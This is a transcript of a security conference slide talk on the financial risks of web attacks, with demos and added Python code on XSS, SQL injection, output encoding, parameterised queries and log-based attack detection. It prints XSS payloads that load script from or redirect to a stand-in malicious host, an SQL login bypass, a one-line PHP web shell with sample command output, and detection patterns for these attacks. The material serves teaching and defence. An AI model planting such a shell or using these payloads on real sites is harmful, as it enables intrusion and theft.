Financial Risks to Internet Security
1. Costs and Financial Risks of Web Security
Martin Lee CISSP CEng
Dr. Les Pritchard CITP
SR B03 - Costs and Financial Risks of Web Security 1
2. Where the Threats Come From.
Insider threats: mostly accidental data deletion.
Acts of God: fire, flood, volcanos!
Malicious outsiders (cybercriminals): malware, banking trojans.
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 2
3. How the Bad Guys Make Money
4. Anyone’s Computer or Your Computer?
Compromising any computer:
Botnets – denial of service attacks, send spam, steal data.
Banking trojans – internet bank robbery.
Compromising specific systems:
Targeted attacks – stealing high value data.
5. Making Money From Botnets – Sending Spam
Traffic analysis of rogue website
26 days, 350 million spams, 28 sales
But, when scaled up
~$7000 in sales per day
~$2M per year
Source: C. Kanich et al. “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”. Nov 2008
(http://www.icsi.berkeley.edu/pubs/networking/2008-ccs-spamalytics.pdf)
6. Making Money From Botnets – Denial of Service
Can hit 100Gb/sec attack traffic.
Estimated UK losses $3bn/yr.
7. Making Money From Banking Trojans
Source : http://www.wired.com/threatlevel/2010/10/zeus-ukraine-arrests/
8. Banking Trojans – Zeus Man-in-Browser Attack
Malware waits for log in to internet banking,
issues payments on your behalf to money mules.
9. Banking Trojans – Zeus Man-in-Browser Attack
Malware intercepts data sent from the bank,
removes its own transfers, adjusts the balance,
and shows you what you expect to see.
10. Distributing Web Malware
Gumblar Lifecycle
Uploading web malware to your website by stealing your login details.
[Diagram: the hacker steals the login for an unaffected website and adds an XSS exploit to it; a victim visits the website, which forwards them to an exploit host; the exploit host installs malware on the victim and then controls it.]
11. Malware on Legitimate Domains
[Chart: malicious domains lifecycle, % remaining active over time (0 to 180 days), “Old” domains against “New” domains.]
Over time more than 80% of malicious domains are “Old” domains.
13. Browsing Habits Outside of the Office
[Chart: % of web blocks (0 to 100) against % of users (20 to 100), Mobile against Office.]
14. Distributing Web Malware – Advertising Services
Subvert a legitimate website.
[Diagram: advert space on a web page is sold by the sales team to an advertiser, sold by a reseller to another advertiser, and resold further to a distributor who serves malware in the adverts.]
15. Fake AV
16. Fake AV
Do the maths –
1 million products sold
@$39.95
$8.2 million fine
= $31.75 million profit!
Source: http://www.pcworld.com/businesscenter/article/217987/alleged_scareware_vendors_to_pay_82_million_to_ftc.html
18. My Website – XSS Example
www.example.com/index.php?page=cat&category=1&PHPSESSID=
19. My Website – XSS Example
Attack JS –
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
URL encode it, replace the 'category' value
www.example.com/index.php?page=cat&category=1&PHPSESSID=
becomes
www.example.com/index.php?page=cat&category=%3E%0A%3C%53%43%52%49
20. My Website – XSS Example
Attacker can execute whatever they like:
Exploit – <script src="http://www.malicious.com/attack.js">
Redirect – window.location.href = "http://www.malicious.com/"
Why not? – document.product.price = "0.01"
21. XSS Example – Click that link
Email containing link
WEB PAGE
Embed link in discussion page
ENTER TEXT SUBMIT
I agree. <img src="/images/smiley.gif" onload="document.location='http://malicious/'">
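As an added illustration of slides 19 and 20 (this is not code from the slides), the same reflected `category` value rendered two ways: copied straight into an attribute, and HTML-encoded first. The `render_vulnerable` / `render_hardened` page functions and the query-string helpers are assumptions made for the example; the payload is the one on slide 19.

```python
import html
import urllib.parse

# The attack string from slide 19; String.fromCharCode(88,83,83) spells "XSS".
ATTACK_JS = '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'


def encoded_query(category: str) -> str:
    """Constructed query string for the example.com page: the value is
    percent-encoded the way a browser (or slide 19) would send it."""
    return urllib.parse.urlencode({"page": "cat", "category": category, "PHPSESSID": ""})


def category_from_query(query: str) -> str:
    """What the server sees: the equivalent of PHP's $_GET['category'].
    parse_qs percent-decodes, just as PHP does before the script runs."""
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    return params.get("category", [""])[0]


def render_vulnerable(category: str) -> str:
    """Slide 18 style page: the parameter is copied into an attribute value
    unchanged, so a leading '">' closes the attribute and the tag."""
    return f'<a href="index.php?page=cat&category={category}">Category</a>'


def render_hardened(category: str) -> str:
    """Same page with output encoding. quote=True turns " and ' into entities
    as well as < > &, so the value can neither end the attribute nor start a tag."""
    safe = html.escape(category, quote=True)
    return f'<a href="index.php?page=cat&category={safe}">Category</a>'


def contains_script_tag(page: str) -> bool:
    """Crude check: does a real <script> element appear in the rendered page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    value = category_from_query(encoded_query(ATTACK_JS))
    print("vulnerable:", render_vulnerable(value))
    print("hardened:  ", render_hardened(value))
```

The hardened output contains `&quot;&gt;&lt;SCRIPT&gt;` rather than a tag, which is why encoding on output (in every HTML context the value is written to) is the fix, not filtering `<SCRIPT>` on input.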
22. SQL Injection – “Little Bobby Tables”
Source: XKCD Comic - http://xkcd.com/327/
23. My Website – SQL Injection Example
SQL injection:
Select * from users where username = "$input" and password=md5($password);
$input = ' admin"; -- '
Select * from users where username = "admin"; -- ... ignored
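An added example (not from the slides) of the slide 23 query in both forms: built by string interpolation, and built with placeholders. It uses an in-memory SQLite table constructed for the purpose; because SQLite delimits string literals with single quotes, the injected username is the slide's `$input` adapted to a single quote. The `md5` column mirrors the slide's schema only and is not a recommendation for password storage.

```python
import hashlib
import sqlite3


def md5_hex(password: str) -> str:
    """Mirrors the slide's md5($password). Unsalted MD5 is kept only so the
    table matches the slide; real systems should use a slow, salted hash."""
    return hashlib.md5(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", md5_hex("correct-horse")))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The slide's query assembled from the raw input. The username is pasted
    into the SQL text, so a quote in it changes the statement's structure."""
    sql = (f"SELECT * FROM users WHERE username = '{username}' "
           f"AND password = '{md5_hex(password)}'")
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The fix: placeholders send the values separately from the SQL text, so a
    quote or comment marker in the input is only ever data."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, md5_hex(password))).fetchone() is not None


# The slide's $input adapted to single quotes: closes the literal, then the
# '--' comment swallows the password check (assumed example value).
INJECTED_USERNAME = "admin' -- "


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, wrong password:", login_vulnerable(db, INJECTED_USERNAME, "wrong"))
    print("parameterised, wrong password:", login_parameterised(db, INJECTED_USERNAME, "wrong"))
```

With the interpolated query the password clause is commented away and the login succeeds with any password; with placeholders the same string is simply a username that does not exist.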
24. My Website – SQL Injection Example
How about a file like this?
<? system($_REQUEST['cmd']); ?>
25. My Website – Now completely at mercy of attacker
http://www.example.com/images/shell.php?cmd=%6C%73%20%2D%6C
ls -l -> %6C%73%20%2D%6C
total 36
-rw-rw-r-- 1 martin martin 191 Nov 27 2003 categories.php
drwxrwxr-x 2 martin martin 4096 Mar 16 17:53 inc
-rw-rw-r-- 1 martin martin 543 Mar 29 14:54 index.old
-rw-r--r-- 1 martin martin 124 Mar 29 15:03 index.php
-rw-rw-r-- 1 martin martin 537 Mar 29 14:41 index.php~
-rw-rw-r-- 1 martin martin 2068 Mar 29 16:20 product_image.php
-rw-rw-r-- 1 martin martin 1924 Nov 28 2003 product_image.php~
-rw-rw-r-- 1 martin martin 189 Nov 27 2003 products.php
-rw-r--r-- 1 martin martin 31 Mar 29 15:04 shell.php
26. Vulnerable Websites
Skilled attackers can easily find vulnerabilities.
Others can use a list of vulnerable websites.
27. How You Lose Money
28. Data Breach Losses
• Ponemon Institute & Symantec Research
– Average cost per data breach $7.2 million.
– $214 per breached record.
– 31% of breaches are malicious or criminal attack.
– Malicious attacks cost more: $318 per breached record.
See: http://www.symantec.com/about/news/release/article.jsp?prid=20110308_01
Calculate your risk: http://databreachcalculator.com/
29. Symantec SMB Survey – What do SMBs suffer?
[Chart: % of SMBs suffering each impact (0% to 60%): environment downtime, corporate data theft, customer or employee PI theft, customer financial information theft, intellectual property theft.]
31. Know Your Assets, Know Attack Vectors
32. Layers of Protection Provide Maximum Detection
33. Test & Monitor Your Web Services
Find & fix vulnerabilities in your web services.
Monitor logs to identify attacks, block attacker.
You don’t need to be perfect, just better than your competitors.
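As an added example of the "monitor logs to identify attacks" advice on slide 33 (not code from the slides), a small access-log scanner that percent-decodes each request and matches it against indicators drawn from the earlier slides: a reflected `<script>` tag, a quote-then-comment SQL terminator, a `cmd=` parameter, and a `.php` file served from the images directory as on slide 25. The log lines are constructed for the example in Combined Log Format, with documentation-range IP addresses; the indicator names and regexes are assumptions, not a product signature set.

```python
import re
import urllib.parse
from collections import Counter

# Constructed sample access-log lines (not real traffic). The third request
# is the slide 25 URL; the others are built to match the XSS and SQL slides.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Mar/2011:15:04:10 +0100] "GET /index.php?page=cat&category=1 HTTP/1.1" 200 1532
203.0.113.9 - - [29/Mar/2011:15:04:12 +0100] "GET /index.php?page=cat&category=%22%3E%3CSCRIPT%3Ealert(1)%3C/SCRIPT%3E HTTP/1.1" 200 1610
203.0.113.9 - - [29/Mar/2011:15:04:15 +0100] "GET /images/shell.php?cmd=%6C%73%20%2D%6C HTTP/1.1" 200 512
198.51.100.4 - - [29/Mar/2011:15:05:01 +0100] "GET /login.php?user=admin%27%3B%20--%20 HTTP/1.1" 200 900
"""

# Combined Log Format: client, identity, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed indicator set, matched against the decoded request path and query.
INDICATORS = {
    "xss_script_tag": re.compile(r"<\s*script", re.I),
    "sql_comment_terminator": re.compile(r"'\s*;?\s*--"),
    "command_param": re.compile(r"(^|[?&])cmd=", re.I),
    "unexpected_php_under_images": re.compile(r"^/images/[^?]*\.php", re.I),
}


def decode_request(path: str) -> str:
    """Percent-decode twice so a double-encoded payload is inspected in the
    same form the application would eventually see it."""
    return urllib.parse.unquote_plus(urllib.parse.unquote_plus(path))


def classify(line: str):
    """Parse one log line; return the client, decoded path and indicator hits,
    or None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_request(m["path"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"ip": m["ip"], "status": m["status"], "path": decoded, "hits": hits}


def analyse(log_text: str):
    """Return (findings, per_ip): suspicious records and a per-client hit count,
    which is the input a blocking decision would be made on."""
    per_ip = Counter()
    findings = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["hits"]:
            findings.append(rec)
            per_ip[rec["ip"]] += len(rec["hits"])
    return findings, per_ip


if __name__ == "__main__":
    found, counts = analyse(SAMPLE_LOG)
    for rec in found:
        print(rec["ip"], rec["status"], rec["path"], rec["hits"])
    print("hits per client:", dict(counts))
```

Decoding before matching matters: the slide 25 request carries `ls -l` only as `%6C%73%20%2D%6C`, so a rule applied to the raw line would never see it. Note also that the `shell.php` request returns 200, which is why the status code alone is a poor signal and the path and parameters have to be inspected.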